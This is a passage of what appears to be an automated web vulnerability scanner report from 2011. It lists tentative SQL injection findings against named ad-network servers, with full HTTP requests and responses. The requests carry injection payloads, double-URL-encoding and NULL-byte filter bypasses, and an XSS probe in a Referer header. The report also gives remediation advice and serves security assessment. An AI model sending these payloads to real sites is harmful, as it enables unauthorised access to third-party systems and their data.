27.114. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx

27.115. http://mig.nexac.com/2/B3DM/DLX/1@x96

27.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

27.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

27.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

27.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

27.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

27.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

27.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

27.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

27.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

27.125. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

27.126. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

27.127. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

27.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]

27.129. http://onset.freedom.com/fi/analytics/cms/

27.130. http://pixel.invitemedia.com/rubicon_sync

27.131. http://support.moxiesoft.com/

27.132. http://tags.expo9.exponential.com/favicon.ico

27.133. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

27.134. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

27.135. http://voken.eyereturn.com/favicon.ico

27.136. http://widgets.mobilelocalnews.com/

27.137. http://www.moxiesoft.com/tal_products/chat.aspx

27.138. http://www.paperg.com/jsfb/embed.php

27.139. http://www.parkersoft.co.uk/favicon.ico

27.140. http://www.screenthumbs.com/favicon.ico

27.141. http://www.screenthumbs.com/inc/nshots.php

27.142. http://www.screenthumbs.com/inc/qstats.php

27.143. http://www.screenthumbs.com/tools/js/linkthumbs.js

27.144. http://www.spicefactory.org/favicon.ico

28. Content type incorrectly stated

28.1. http://4c28d6.r.axf8.net/mr/a.gif

28.2. http://amch.questionmarket.com/adscgen/st.php

28.3. http://ar.voicefive.com/b/rc.pli

28.4. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

28.5. http://b.scorecardresearch.com/favicon.ico

28.6. http://b3.mookie1.com/favicon.ico

28.7. http://base.liveperson.net/hcp/html/mTag.js

28.8. http://base.liveperson.net/visitor/addons/deploy.asp

28.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.10. http://common.onset.freedom.com/fi/adsense/

28.11. http://common.onset.freedom.com/fi/analytics/cms/

28.12. http://event.adxpose.com/event.flow

28.13. http://events.cbs6albany.com/images/zbutton.gif

28.14. http://events.cbs6albany.com/json

28.15. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico

28.16. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx

28.17. http://mig.nexac.com/favicon.ico

28.18. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/615353505/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c

28.19. http://oascentral.bostonherald.com/favicon.ico

28.20. http://onset.freedom.com/fi/analytics/cms/

28.21. http://raw.oggifinogi.com/Service.svc/OptOutCookiePresents

28.22. http://raw.oggifinogi.com/crossdomain.xml

28.23. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx

28.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx

28.25. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx

28.26. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx

28.27. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

28.28. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

28.29. http://twitter.com/oexchange.xrd

28.30. http://www.berkshireeagle.com/favicon.ico

28.31. http://www.bostonherald.com/home/includes/twitter.inc

28.32. http://www.bostonherald.com/projects/boston_pensions/

28.33. http://www.bostonherald.com/track/includes/twitter.inc

28.34. http://www.cbs6albany.com/images/logo.gif

28.35. http://www.moxiesoft.com/tal_products/chat.aspx

28.36. http://www.paperg.com/jsfb/embed.php

28.37. http://www.screenthumbs.com/tools/js/linkthumbs.js

28.38. http://www.spicefactory.org/parsley/schema/2.2/parsley-core.xsd

28.39. http://www.zvents.com/images/bd_bg.gif

28.40. http://www.zvents.com/images/bg_searchbar.gif

28.41. http://www.zvents.com/images/zbutton.gif

28.42. http://www.zvents.com/images/zlogo.gif

28.43. http://www.zvents.com/json

28.44. http://www.zvents.com/partner_json/search

29. Content type is not specified

29.1. http://ad.turn.com/favicon.ico

29.2. http://ads.bluelithium.com/st

29.3. http://base.liveperson.net/hc/5296924/cmd/url/

29.4. https://base.liveperson.net/hc/5296924/

29.5. http://www.mixpo.com/favicon.ico

30. SSL certificate



1. SQL injection  next
There are 122 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://4c28d6.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y'&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 01:54:17 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y''&v=1 HTTP/1.1
Host: 4c28d6.r.axf8.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 01:54:18 GMT

gomez.b1(0,0);

1.2. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=avnFcitMPm5rTgUyMAViQGXRj2XFiSZdW6ruZckmWfWkP5fEKbBOxEM3WdZaBv6Zad9mGUIuyv1rZcFTKo1n96DqoQXtUGgHaRTCOLQwbc4P2UpKxK7yQZbRdZbHj87Sx6M98nZbEfBJrvK5KB3QBeM92UFObRbhTPS4GkoC4LFwoU09EquWu1mITmZcxMVUVxST36WvQxSqplHisUs1cxL07LlwMQDb3vZaPlDUp9Vx0QqxphU4s7eg3SZawUlLkDgYtuXHxp6lrZcnyIhwvKte1Iny31sJWJnhbjNRHBZdt84iTMXd0HTu6JEKkLlUyt0m0QafqP1fZdd5ASLG3xpIlyd0QlyqGPm67fJ3EfoZbrBinCj0SKwamAFUcUZakxQS8JZdwvBUECON4QWZbrfUdUrvWphbF5213TQOKyuUQBTEZbiXxsVFAiLq1QqZb3k2SdatZaPnbKE9KqIfTNYvUeFSpx27pe4ZaXBRsr9b13hGOm84Ls5HWHZd4Gd3qxZc17rVg5y6vCJtZdkonvlQ6ModIyoqkFNfpBsOFRC4aSCZcZbr8WbZcJLUTjgFkO8ns4yZb0QTDBjZbgrHRfQh0O1MK6QlIfGo25; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:16 GMT;
Content-Type: text/html
Location: http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Request 2

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response 2 (redirected)

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aAnFciqO2cur2OqNvhrZbroT7rI4FbUGtyAUZbK7Wwpt3JAeZcprc0mvJVbE8royfFWxpH2XnUbkRQ1kDMoaYmCnYNEC8KE8HLgxSpBGZdVe7VHuG1rP3PG59clGpZce3hWxkjOcIyaAxdATQ7wvPTJGgmjAu7UQ34gxps6ZdvwqPoImurPwoLmyGJTwUE4W2yM0yo16w7Zdli8M9YU4OWDZdjt5FrZaIJkxZbVRSBsORAuJuhitYTAWyp2ATjdIFXJFyw5Xo6h9KQiMeur2PeS3PNYmUepMMXMvuRZcHGWNhBWYJdJ9Zbrs6eZcuOsqIpZcrXYHbc6UZde0vZdtlZcShS5gjxC3NukC6P7euZbUJJC4yE2pLJwCZaZcPUZbGY22ZbNvmBGCC3Yq3aKKqMuBgq6IjnXu4pLtBiTH4BEAllZbPSCZaAE3mPyUZb7c0u5QVbyi5thiFbyntlAhhfFit4gtHIjSdSJ9AZbgBwFPxWtSoI1aTRtYhTOD5VDiZbda3Txp2TswbM8UaZdF52sS7ZaP6va9eiHtiJeZcpJ94HVfMFtsCNjsQbHZdCrIXHGKk88RHn1pMPUrqi4nSShYIVj8hiH2JCnGQSV; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:17 GMT;
Content-Type: text/html
Location: http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N3340.trfu/B4938104.54

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:24:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37394

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
7878586;";
this.swfParams = 'aid=232434380&cid=39972439&pid=55865628&src=1361549&rv=3&rid=39990226&modelYear=&oem=&offerType=&modelName=&modelYear=2011&oem=nissan&offerType=positivemathstack&modelName=rogue';
this.renderingId = "39990226";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsM
...[SNIP]...

Request 2

GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 17:24:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 33336

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...

1.4. http://ad.doubleclick.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/cm.quadbostonherald/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/cm.quadbostonherald/?1%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Aug 27 15:34:32 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/cm.quadbostonherald/?1%2527%2527=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 882
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('');

var fd_clk = 'http://adsfac.us/link.asp?cc=QAN007.310009.0&clk=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/3/0/%2a/q%3B234940335%3B0-0%3B0%3B27622757%3B255-0/0%3B40265255/402830
...[SNIP]...

1.5. http://ads2.adbrite.com/v0/ad [zs parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /v0/ad?sid=1198099&zs=3732385f3930%00'&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: text/html;charset=utf-8
Content-Length: 1000
Date: Sat, 29 Jan 2011 01:56:24 GMT
Connection: close

<html><head><title>Apache Tomcat/6.0.18 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans
...[SNIP]...

Request 2

GET /v0/ad?sid=1198099&zs=3732385f3930%00''&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
